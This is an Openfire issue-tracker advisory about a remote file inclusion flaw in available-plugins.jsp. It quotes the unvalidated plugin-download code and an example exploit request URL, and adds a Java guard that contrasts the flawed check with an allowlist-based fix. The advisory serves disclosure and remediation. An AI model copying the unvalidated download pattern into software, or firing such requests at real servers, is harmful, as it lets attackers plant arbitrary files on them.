Openfire issue OF-1020

Admin Console Remote File Inclusion (RFI) Vulnerability


Description

hyp3rlinx reported that Openfire v3.10.2 suffers from a Remote File Inclusion (RFI) vulnerability.

Full details: https://packetstormsecurity.com/files/133560/Openfire-3.10.2-Remote-File-Inclusion.html

Vulnerability Details:
In "available-plugins.jsp" there is no validation for plugin downloads, allowing arbitrary file downloads from anywhere on the internet.

On line 40: all that needs to be satisfied is that the parameter is not null.

    // Line 40: a download is requested whenever the "download" parameter is present;
    // "url" is taken from the request as-is.
    boolean downloadRequested = request.getParameter("download") != null;
    String url = request.getParameter("url");

If the above condition check returns true, the application downloads whatever file you give it.
Line 54:

    if (downloadRequested) {
        // Download and install new plugin; url is passed through unvalidated
        updateManager.downloadPlugin(url);
        // Log the event
        webManager.logEvent("downloaded new plugin from "+url, null);
    }

Exploit code(s):
1) Download arbitrary file, e.g.

    http://[hostname]:[port]/available-plugins.jsp?download=1&url=http://www.igniterealtime.org/downloads/download-landing.jsp?file=openfire/openfire_4_0_0_beta.zip

Our RFI will then be downloaded to the "openfire\plugins" directory.
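The following Java guard is an added example, not Openfire's own fix (which this issue does not describe): it keeps the original non-null check beside a hardened one that only honours a download when the url parameter exactly matches a link the server itself advertised on available-plugins.jsp and that link points at an allowlisted host. The PluginDownloadGuard class, the host allowlist and the sample URLs are assumptions.

```java
import java.net.URI;
import java.net.URISyntaxException;
import java.util.Set;

// Hypothetical guard for the download branch of available-plugins.jsp (added
// example, not Openfire's code): only server-advertised plugin URLs are accepted.
public class PluginDownloadGuard {
    // Assumed allowlist of hosts that may serve plugin archives.
    private static final Set<String> ALLOWED_HOSTS =
            Set.of("www.igniterealtime.org", "igniterealtime.org");
    // Download links the update manager itself listed on the page.
    private final Set<String> advertisedUrls;

    public PluginDownloadGuard(Set<String> advertisedUrls) {
        this.advertisedUrls = Set.copyOf(advertisedUrls);
    }

    // The check from the original page: any non-null value is accepted.
    public static boolean vulnerableCheck(String url) {
        return url != null;
    }

    // Hardened check: the value must be an advertised URL, parse as a URI,
    // use http(s) and point at an allowlisted host; anything else is refused.
    public boolean isAllowed(String url) {
        if (url == null || !advertisedUrls.contains(url)) {
            return false;
        }
        try {
            URI uri = new URI(url);
            String scheme = uri.getScheme();
            String host = uri.getHost();
            return scheme != null && host != null
                    && (scheme.equals("http") || scheme.equals("https"))
                    && ALLOWED_HOSTS.contains(host.toLowerCase());
        } catch (URISyntaxException e) {
            return false;
        }
    }

    public static void main(String[] args) {
        // Constructed sample: the single URL the admin page listed.
        String listed = "http://www.igniterealtime.org/downloads/download-landing.jsp?file=openfire/openfire_4_0_0_beta.zip";
        PluginDownloadGuard guard = new PluginDownloadGuard(Set.of(listed));
        String unlisted = "http://unlisted.example/plugin.jar";
        // Compare the original check with the hardened one on an unlisted URL,
        // then confirm the advertised URL still passes the hardened check.
        System.out.println("original check, unlisted: " + vulnerableCheck(unlisted));
        System.out.println("hardened check, unlisted: " + guard.isAllowed(unlisted));
        System.out.println("hardened check, listed:   " + guard.isAllowed(listed));
    }
}
```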

People

Assignee: dwd Dave Cridland
Reporter: timd Tim Durden